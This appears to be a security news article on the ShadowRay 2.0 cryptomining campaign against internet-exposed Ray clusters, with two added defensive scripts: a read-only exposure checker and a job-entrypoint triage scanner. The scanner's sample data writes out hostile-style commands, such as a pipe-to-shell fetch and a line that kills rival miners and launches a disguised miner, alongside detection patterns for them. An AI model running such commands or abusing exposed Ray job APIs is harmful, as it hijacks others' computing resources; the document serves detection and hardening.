👤 GHOSTCOMPLY
🗓️ 19 Nov 2025  

AI Clusters Under Siege: ShadowRay 2.0 Turns Supercomputers Into Crypto Mines

ShadowRay 2.0 exploits a long-known, unpatched flaw in Ray clusters, hijacking vast AI infrastructure for cryptocurrency mining, data theft and further attacks, while keeping a low profile with AI-generated payloads, throttled mining and innocuous process names.

Fast Facts

  • ShadowRay 2.0 is a global cyberattack hijacking Ray clusters with an old, unfixed vulnerability.
  • The attackers use AI-generated code to mine cryptocurrency, steal data, and launch DDoS attacks.
  • Over 230,000 Ray servers are now exposed online, up from just a few thousand last year.
  • The main flaw, CVE-2023-48022, is unpatched by design: Anyscale treats unauthenticated job submission as expected behaviour because Ray is built for trusted networks.
  • Attackers disguise their malware and eliminate rival miners to monopolize compromised systems.

The Shadow Looms: A New Breed of Cyberattack

Picture a digital gold rush where the pickaxes are lines of code and the mines are powerful computers meant for artificial intelligence. In the latest wave of cybercrime, attackers have set their sights on Ray clusters - distributed computing systems designed to supercharge AI and Python workloads. But instead of training smart models, these clusters are now being forced to dig for digital gold: cryptocurrency.

What Is Ray and Why Is It Vulnerable?

Ray, an open-source framework maintained by Anyscale, allows companies and researchers to run AI and data processing jobs across many computers at once. It was built under the assumption that these clusters would live inside trusted, tightly controlled networks. But as cloud adoption boomed, Ray head nodes ended up on public IP addresses in large numbers - an open invitation to anyone scanning for them.

The core of the problem is CVE-2023-48022: the Jobs API served by the Ray dashboard (TCP 8265 by default) accepts job submissions from anyone who can reach it, with no authentication at all. A job's entrypoint is simply a shell command that the cluster runs on the head node, with the whole cluster's resources on call, so an exposed dashboard amounts to unauthenticated remote code execution. Anyscale disputes the CVE, holding that Ray is meant to run only inside a trusted network boundary, so no fix has been released - and the door stays wide open wherever that assumption does not hold.
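A practical first step is to find out whether your own dashboards answer the Jobs API without credentials. The check below is an added example for this article, not code from Oligo, Anyscale or the Ray project. It assumes the two public Jobs API endpoints `GET /api/version` (identifies a Ray dashboard) and `GET /api/jobs/` (lists submitted jobs) on the dashboard port, 8265 by default, and uses only read requests, never a job submission. The verdict labels and the classification rules are this example's own.

```python
"""Check whether a Ray dashboard exposes its Jobs API without authentication.

Added example, not code from the original article or from the Ray project.
Assumed endpoints (from Ray's public Jobs REST API, served by the dashboard):
  GET /api/version  -> 200 with JSON if this is a Ray dashboard
  GET /api/jobs/    -> 200 with a JSON list of submitted jobs
If /api/jobs/ returns that list to a request carrying no credentials, then
anyone who can reach the port can also POST a job, i.e. run a shell command
on the head node. This script only reads; it never submits anything.
"""
import json
import urllib.error
import urllib.request
from typing import Tuple


def classify(version_status: int, jobs_status: int, jobs_body: str) -> str:
    """Turn raw HTTP results into a verdict (rules are this example's own).

    'not-ray'    - /api/version did not answer 200, so probably not a Ray dashboard
    'protected'  - /api/jobs/ rejected the unauthenticated request
    'exposed'    - /api/jobs/ answered 200 with a JSON list: no auth in front of it
    'unknown'    - a dashboard is there but the jobs endpoint behaved unexpectedly
                   (e.g. a login page served with status 200 by a reverse proxy)
    """
    if version_status != 200:
        return "not-ray"
    if jobs_status in (401, 403, 407):
        return "protected"
    if jobs_status == 200:
        try:
            parsed = json.loads(jobs_body)
        except ValueError:
            return "unknown"
        if isinstance(parsed, list):
            return "exposed"
    return "unknown"


def _get(url: str, timeout: float) -> Tuple[int, str]:
    """GET with no credentials; return (status, body), never raising on HTTP errors.
    Status 0 means the connection itself failed."""
    req = urllib.request.Request(url, headers={"User-Agent": "ray-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return 0, ""


def probe(host: str, port: int = 8265, timeout: float = 5.0, scheme: str = "http") -> str:
    """Probe one host:port and return a classify() verdict. Read-only."""
    base = f"{scheme}://{host}:{port}"
    v_status, _ = _get(f"{base}/api/version", timeout)
    if v_status != 200:
        return classify(v_status, 0, "")
    j_status, j_body = _get(f"{base}/api/jobs/", timeout)
    return classify(v_status, j_status, j_body)


if __name__ == "__main__":
    import sys
    # usage: python ray_exposure_check.py host1 host2 ...   (default port 8265)
    for target in sys.argv[1:]:
        print(target, probe(target))
```

Run it only against hosts you own or are authorised to test. A result of "exposed" on anything with a public address means the cluster should be taken off the internet now, not after the next change window; "unknown" usually means a reverse proxy or SSO page is in front and deserves a manual look.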

ShadowRay 2.0: AI-Generated Malware With a Mission

Enter ShadowRay 2.0, a campaign traced to a threat actor dubbed IronErn440. According to Oligo Security, this attacker uses AI-powered tools - think ChatGPT for cybercrime - to craft malicious payloads. These scripts don’t just mine Monero cryptocurrency; they also open backdoors, steal data and credentials, and can unleash distributed denial-of-service (DDoS) attacks to disrupt other systems.

The malware is careful rather than loud: it profiles the host's hardware, caps how much CPU the miner takes so that the load does not stand out, and runs under an innocuous process name such as "dns-filter". It also kills any rival mining processes it finds, so that only IronErn440 profits from the hijacked hardware, and pulls fresh payloads from GitHub, which keeps the campaign adaptable and persistent.
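The behaviours above (fetches from GitHub, competitor killing, the "dns-filter" name, throttled mining) are exactly what tends to show up in a job's entrypoint string, which the Ray dashboard returns for every submitted job. The triage script below is an added example, not Oligo's or the Ray project's code. It runs a set of generic cryptominer heuristics over constructed job records shaped like the `submission_id` and `entrypoint` fields of Ray's job listing. The only indicator taken from the article is the "dns-filter" name; the other patterns are generic miner heuristics, and the sample entrypoints, weights and thresholds are made up for the demonstration.

```python
"""Triage Ray job entrypoints for cryptominer-style behaviour.

Added example, not code from the article, Oligo or the Ray project.
Input records mimic the `submission_id` and `entrypoint` fields that
GET /api/jobs/ on the Ray dashboard returns for each submitted job.
Indicator patterns are generic miner heuristics; only the "dns-filter"
process name comes from the reported campaign. Weights and thresholds
are this example's own choices, not published IOCs.
"""
import json
import re
import sys

# (name, weight, pattern) - a higher weight is a stronger signal on its own
INDICATORS = [
    ("pipe-to-shell",     3, re.compile(r"\|\s*(bash|sh|zsh|dash)\b")),
    ("base64-decode",     2, re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("remote-fetch",      1, re.compile(r"https?://(raw\.githubusercontent\.com|github\.com|pastebin\.com)/", re.I)),
    ("miner-name",        4, re.compile(r"\b(xmrig|minerd|cpuminer|xmr-stak)\b", re.I)),
    ("kills-competitors", 4, re.compile(r"\b(pkill|killall)\b[^;|\n]*\b(xmrig|miner|kdevtmpfsi|kinsing)\b", re.I)),
    ("disguised-name",    4, re.compile(r"\bdns-filter\b", re.I)),  # name reported in the article
    ("cpu-throttle",      2, re.compile(r"(--cpu-max-threads-hint|--max-cpu-usage|\bcpulimit\b)", re.I)),
    ("background-daemon", 1, re.compile(r"\bnohup\b|\bsetsid\b|&\s*$")),
]


def verdict(score: int) -> str:
    """Map a weighted score to a triage bucket (thresholds are arbitrary choices)."""
    if score >= 8:
        return "high"
    if score >= 3:
        return "medium"
    if score >= 1:
        return "low"
    return "clean"


def triage(jobs):
    """Return one dict per job: matched indicator names, weighted score and verdict."""
    results = []
    for job in jobs:
        entry = job.get("entrypoint") or ""
        hits = [name for name, _, pat in INDICATORS if pat.search(entry)]
        score = sum(weight for name, weight, _ in INDICATORS if name in hits)
        results.append({
            "submission_id": job.get("submission_id"),
            "hits": hits,
            "score": score,
            "verdict": verdict(score),
        })
    return results


# Constructed sample records for the demonstration, not real observations.
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_A1",
     "entrypoint": "python train.py --epochs 10 --data /mnt/ds"},
    {"submission_id": "raysubmit_B2",
     "entrypoint": "curl -s https://raw.githubusercontent.com/example/repo/main/setup.sh | bash"},
    {"submission_id": "raysubmit_C3",
     "entrypoint": "pkill -f xmrig; echo aGk= | base64 -d | sh; "
                   "nohup ./dns-filter --cpu-max-threads-hint 50 &"},
    {"submission_id": "raysubmit_D4",
     "entrypoint": "pip install git+https://github.com/example/lib.git && python run.py"},
]


if __name__ == "__main__":
    # usage: python ray_job_triage.py [jobs.json]   (a saved GET /api/jobs/ response)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            jobs = json.load(fh)
    else:
        jobs = SAMPLE_JOBS
    for r in sorted(triage(jobs), key=lambda r: -r["score"]):
        print(f'{r["verdict"]:6} {r["score"]:3}  {r["submission_id"]}  {", ".join(r["hits"]) or "-"}')
```

The weights are deliberately uneven: a single `curl | bash` from a GitHub raw URL already lands in "medium", while anything that kills competing miners or calls itself "dns-filter" goes straight to "high" regardless of what else it does. A legitimate `pip install git+https://github.com/...` only scores "low", which is the point of scoring rather than blocking on any one pattern.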

Wider Ripples: Risks for AI and Cloud Ecosystems

The scale of exposure is staggering - more than 230,000 Ray servers are now reachable from the internet, a consequence of the explosive growth of public cloud deployments. The pattern is familiar: Kubernetes and Hadoop clusters have been hit the same way in recent years, through management APIs left reachable without authentication and abused for cryptomining and botnets. As AI becomes more central to business and research, the stakes for securing these clusters have never been higher.

Anyscale and security experts urge users to treat every Ray port as internal: never bind the dashboard (TCP 8265, which also serves the Jobs API) to a public interface, keep the GCS port (6379 by default) and the Ray Client port (10001) reachable only from the cluster's own network, and put any remote access behind a VPN, an SSH tunnel or an authenticating reverse proxy. Because there is no software fix, a cluster is only as safe as the network boundary around it, so the shadow hanging over Ray will persist. For now the battle is one of vigilance and configuration discipline, as hackers continue to evolve their methods - sometimes with the very AI tools these clusters were meant to empower.

The ShadowRay 2.0 saga is a cautionary tale for the age of AI: in the race to scale, security can’t be left behind. As the boundaries between innovation and exploitation blur, organizations must rethink what it means to trust - and defend - their most powerful machines.

WIKICROOK

  • Ray Cluster: A Ray Cluster is a network of computers using the Ray framework to run large-scale AI and data processing tasks efficiently and in parallel.
  • Cryptomining: Cryptomining uses computer power to solve puzzles and earn digital currencies, sometimes exploiting devices without the owner’s knowledge or consent.
  • CVE: CVE, or Common Vulnerabilities and Exposures, is a system for uniquely identifying and tracking publicly known cybersecurity flaws in software and hardware.
  • DDoS Attack: A DDoS attack is when many computers flood a service with fake requests, overwhelming it and making it slow or unavailable to real users.
  • AI: AI, or Artificial Intelligence, is technology that enables machines to mimic human intelligence, learning from data and improving over time.
Tags: AI Clusters, Cyberattack, Cryptomining

GHOSTCOMPLY
Compliance & Legal-Tech Advisor